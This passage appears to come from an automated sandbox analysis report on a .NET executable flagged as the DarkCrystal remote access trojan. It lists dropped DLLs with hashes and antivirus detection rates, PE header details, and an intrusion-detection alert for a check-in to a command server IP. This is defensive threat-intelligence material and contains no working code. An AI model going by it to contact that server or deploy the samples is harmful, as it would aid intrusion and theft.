                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\oYwxMpHv.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\pHpfyUNt.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                  C:\Users\user\Desktop\psJpXhFT.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34304
                                                  Entropy (8bit):5.618776214605176
                                                  Encrypted:false
                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 9%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\rIogOAZx.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):126976
                                                  Entropy (8bit):6.057993947082715
                                                  Encrypted:false
                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                  C:\Users\user\Desktop\sdoGeuPL.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\tTxOTVxp.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\uzSEaASh.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.529329139831718
                                                  Encrypted:false
                                                  SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                  MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                  SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                  SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                  SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\vdCwVejC.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.629584586954759
                                                  Encrypted:false
                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\xJoFaSxi.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):5.645950918301459
                                                  Encrypted:false
                                                  SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                  MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                  SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                  SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                  SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\yOiNcrtu.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):41472
                                                  Entropy (8bit):5.6808219961645605
                                                  Encrypted:false
                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\yWRfHaUA.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38400
                                                  Entropy (8bit):5.699005826018714
                                                  Encrypted:false
                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                  MD5:87765D141228784AE91334BAE25AD743
                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ypIvhwSa.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  C:\Users\user\Desktop\zTtncajv.log

                                                  Download File
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):24064
                                                  Entropy (8bit):5.4346552043530165
                                                  Encrypted:false
                                                  SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                  MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                  SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                  SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                  SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                  \Device\Null

                                                  Download File
                                                  Process:C:\Windows\System32\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.6179633833572735
                                                  Encrypted:false
                                                  SSDEEP:12:PBa5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZUdUOAokItULVDv
                                                  MD5:4D6227259BB03B08E330E280821125D2
                                                  SHA1:3704E26F097D1C3A587ABCB4DD69F7E2DC0C3923
                                                  SHA-256:A4DB479BD0F72E05ECAB2D8B08D8F3505A034753BCEEAA13CC803E4B4AF19FA8
                                                  SHA-512:DE01ECF11A8289F2740EFEDFF94B18619F93E7408A1CBAB0EE97C59655CBC492F9033D9A8CB9961669DCE5BCD890F8CD275C7DD9DF7F9848115F140B7314F5A8
                                                  Malicious:false
                                                  Preview:..Pinging 367706 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.193302330489937
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:85D5ktqjpd.exe
                                                  File size:4'515'328 bytes
                                                  MD5:97c2927135dd8fce7d56d5e1b2914bfa
                                                  SHA1:a6b5eb9800ea4fef6da44d306d743941143d87ea
                                                  SHA256:21922a6cc19a72509d69fb830853a1e7e3af5b3e44134da7d1b65c3ee78f6037
                                                  SHA512:78c5f18762a688557eb4994e6685481b3883e6c0dcc27c7abb05b7fe524bed24e949ef5ae2b91b9da6332b26d14b1ab1abd35961235d2d4ee6b8663e0849fe87
                                                  SSDEEP:98304:Py2oIYlDUAiLvpUcOqSzbF2xymJ1d5IYbDkS/QpU34:Py2LYlD6xUcOZVmJ1d5Ia134
                                                  TLSH:8B26F14E57664E73C2D43F3488D7042D82B6F2267522EF2B365F24D9B9462328B166F3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................~;...........;.. ....;...@.. ........................;...........@................................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x7b9d0e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3b9cc00x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ba0000x370.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x3bc0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x3b7d140x3b7e00ea5083b2726cd9f8c2c5d91d929f510cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x3ba0000x3700x4002cf46166977c39af7fde4d8438eccbc8False0.3779296875data2.867353130536527IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .reloc0x3bc0000xc0x2002148754c9e04bdd83ec5967ea69712b7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x3ba0580x318data0.44823232323232326

                                                  Imports

                                                  DLLImport
                                                  mscoree.dll_CorExeMain

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-12T09:17:22.415092+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973191.211.249.4680TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 12, 2025 09:17:21.751955986 CET4973180192.168.2.491.211.249.46
                                                  Jan 12, 2025 09:17:21.756731987 CET804973191.211.249.46192.168.2.4
                                                  Jan 12, 2025 09:17:21.756877899 CET4973180192.168.2.491.211.249.46
